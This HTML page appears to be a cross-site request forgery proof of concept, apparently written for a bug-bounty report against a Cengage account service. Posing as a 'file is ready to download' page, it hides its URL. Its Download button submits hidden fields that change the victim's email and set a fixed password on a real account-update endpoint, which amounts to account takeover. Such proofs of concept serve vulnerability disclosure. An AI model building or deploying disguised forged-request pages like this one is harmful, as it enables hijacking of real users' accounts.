<html lang=en>
<head>
<title>file ready...</title>
<link rel="stylesheet" type="text/css" href="css/tacit-css.min.css"/>
</head>
  <body>
  <center><h1>file is ready to download.<h1></center>
  <script>history.pushState('', '', '/')</script>
    <form action="https://myhome.cengagebrain.com/cb/myaccount.htm">
      <input type="hidden" name="method" value="updateMyAccount" />
      <input type="hidden" name="fname" value="you has" />
      <input type="hidden" name="middleInitial" value="" />
      <input type="hidden" name="lname" value="been hacked" />
      <input type="hidden" name="email" value="hexygo&#64;bugcrowd3&#46;com" />
      <input type="hidden" name="confirmationEmail" value="hexygo&#64;bugcrowd3&#46;com" />
      <input type="hidden" name="newpass" value="s2ipRR4pg9XvB9999" />
      <input type="hidden" name="confirmationNewpass" value="s2ipRR4pg9XvB9999" />
      <input type="hidden" name="question" value="What&#32;is&#32;the&#32;name&#32;of&#32;your&#32;high&#32;school&#63;" />
      <input type="hidden" name="answer" value="" />
      <input type="hidden" name="birthYear" value="2000" />
      <input type="hidden" name="timeZone" value="Africa&#47;Casablanca" />
      <input type="hidden" name="page" value="1" />
      <center><input type="submit" value="Download" />
    </form>
  </body>
</html>
</html>